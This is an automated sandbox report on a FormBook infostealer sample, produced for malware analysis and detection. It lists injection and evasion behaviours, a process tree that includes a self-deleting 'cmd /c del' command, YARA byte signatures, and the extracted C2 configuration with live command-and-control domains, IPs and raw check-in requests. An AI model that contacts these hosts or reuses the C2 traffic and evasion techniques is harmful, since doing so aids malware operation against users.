Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Iifpj4i2kC.exe

Overview

General Information

Sample name:Iifpj4i2kC.exe
renamed because original name is a hash value
Original sample name:fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0.exe
Analysis ID:1529801
MD5:f6e047942236cefdcd6559bca66a7b3e
SHA1:28aac545fcd0c9b11d2546110966b812d1c6d920
SHA256:fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Iifpj4i2kC.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\Iifpj4i2kC.exe" MD5: F6E047942236CEFDCD6559BCA66A7B3E)
    • conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 6880 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 4872 cmdline: "C:\Windows\System32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • csc.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wlanext.exe (PID: 6432 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 1908 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 41 entries
      SourceRuleDescriptionAuthorStrings
      3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 25 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Iifpj4i2kC.exe", ParentImage: C:\Users\user\Desktop\Iifpj4i2kC.exe, ParentProcessId: 6924, ParentProcessName: Iifpj4i2kC.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6880, ProcessName: svchost.exe
          Source: Process startedAuthor: Tim Rauch: Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 6432, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", ProcessId: 1908, ProcessName: cmd.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Iifpj4i2kC.exe", ParentImage: C:\Users\user\Desktop\Iifpj4i2kC.exe, ParentProcessId: 6924, ParentProcessName: Iifpj4i2kC.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6880, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-09T12:32:56.588967+020020314531Malware Command and Control Activity Detected192.168.2.6499943.33.130.19080TCP
          2024-10-09T12:32:56.588967+020020314531Malware Command and Control Activity Detected192.168.2.649991172.96.187.8980TCP
          2024-10-09T12:33:41.057307+020020314531Malware Command and Control Activity Detected192.168.2.649900103.235.47.18880TCP
          2024-10-09T12:34:40.120774+020020314531Malware Command and Control Activity Detected192.168.2.649988104.18.14.10580TCP
          2024-10-09T12:36:43.677634+020020314531Malware Command and Control Activity Detected192.168.2.64999244.227.65.24580TCP
          2024-10-09T12:37:07.424803+020020314531Malware Command and Control Activity Detected192.168.2.649993118.27.100.15180TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
          Source: http://www.upcyclecharms.com/md02/www.hecxion.xyzVirustotal: Detection: 7%Perma Link
          Source: Iifpj4i2kC.exeReversingLabs: Detection: 55%
          Source: Iifpj4i2kC.exeVirustotal: Detection: 70%Perma Link
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: Iifpj4i2kC.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdb source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: csc.pdbF source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then mov rax, rcx0_2_00007FF67FAB9FC0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then push rbx0_2_00007FF67FAFCC30
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF67FB27A90
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then push rbx0_2_00007FF67FACFAA0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF67FACF9C0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then push rdi0_2_00007FF67FB24450
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 4x nop then push rdi0_2_00007FF67FB20200
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then pop esi5_2_0041731B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4x nop then pop ebx5_2_00407B20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi7_2_00EE731B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx7_2_00ED7B22

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49900 -> 103.235.47.188:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.235.47.188 80Jump to behavior
          Source: Malware configuration extractorURLs: www.upcyclecharms.com/md02/
          Source: DNS query: www.zbbnp.xyz
          Source: DNS query: www.a1b5v.xyz
          Source: global trafficHTTP traffic detected: GET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1Host: www.zruypj169g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1Host: www.33mgbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
          Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
          Source: Joe Sandbox ViewASN Name: BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0E236F82 getaddrinfo,setsockopt,recv,6_2_0E236F82
          Source: global trafficHTTP traffic detected: GET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1Host: www.zruypj169g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1Host: www.33mgbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.zruypj169g.top
          Source: global trafficDNS traffic detected: DNS query: www.teplo-invest.com
          Source: global trafficDNS traffic detected: DNS query: www.zbbnp.xyz
          Source: global trafficDNS traffic detected: DNS query: www.33mgbet.com
          Source: global trafficDNS traffic detected: DNS query: www.a1b5v.xyz
          Source: global trafficDNS traffic detected: DNS query: www.lynxpire.com
          Source: global trafficDNS traffic detected: DNS query: www.chiri.lat
          Source: global trafficDNS traffic detected: DNS query: www.rslotrank.win
          Source: global trafficDNS traffic detected: DNS query: www.partymaxclubmen36.click
          Source: global trafficDNS traffic detected: DNS query: www.tdshomesolution.com
          Source: global trafficDNS traffic detected: DNS query: www.onsen1508.com
          Source: global trafficDNS traffic detected: DNS query: www.barnesassetrecovery.store
          Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: Iifpj4i2kC.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
          Source: Iifpj4i2kC.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
          Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
